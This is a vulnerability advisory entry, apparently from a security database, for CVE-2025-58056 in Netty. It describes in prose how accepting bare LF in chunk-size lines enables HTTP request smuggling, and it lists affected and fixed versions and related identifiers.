PT-2025-35821 · Netty+6 · Netty+6

Jeppw

Publicado

2025-09-03

Atualizado

2026-05-18

CVE-2025-58056

CVSS v2.0

7.8

Alta

Vetor

AV:N/AC:L/Au:N/C:N/I:C/A:N

Name of the Vulnerable Software and Affected Versions Netty versions 4.1.124.Final Netty versions 4.2.0.Alpha3 through 4.2.4.Final

Description Netty is an asynchronous event-driven network application framework for development of maintainable high performance protocol servers and clients. Netty incorrectly accepts standalone newline characters (LF) as a chunk-size line terminator, regardless of a preceding carriage return (CR), instead of requiring CRLF per HTTP/1.1 standards. When combined with reverse proxies that parse LF differently, attackers can craft requests that the proxy sees as one request but Netty processes as two, enabling request smuggling attacks.

Recommendations Netty version 4.1.125.Final Netty version 4.2.5.Final

Exploit

Correção

DoS

HTTP Request/Response Smuggling

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

dbugs@ptsecurity.com

Enumeração de Fraquezas

CWE-444

Identificadores relacionados

ALT-PU-2025-12309

ALT-PU-2025-13422

BDU:2025-12593

CLEANSTART-2026-DD05788

CLEANSTART-2026-GQ14179

CLEANSTART-2026-JU62349

CLEANSTART-2026-JW30455

CLEANSTART-2026-KU61465

CLEANSTART-2026-LE11246

CLEANSTART-2026-MM00120

CLEANSTART-2026-RN56220

CLEANSTART-2026-SQ91016

CLEANSTART-2026-SV95049

CLEANSTART-2026-VH41554

CLEANSTART-2026-WG59699

CLEANSTART-2026-WK99982

CVE-2025-58056

ECHO-564B-AFEC-8020

GHSA-FGHV-69VJ-QJ49

OPENSUSE-SU-2025:15520-1

SUSE-SU-2025:03114-1

SUSE-SU-2025_03114-1

USN-7918-1

Produtos afetados

Alt Linux

Debian

Linuxmint

Netty

Red Os

Suse

Ubuntu

PT-2025-35821 · Netty+6 · Netty+6

CVE-2025-58056

Enumeração de Fraquezas

Identificadores relacionados

Produtos afetados

Referências · 377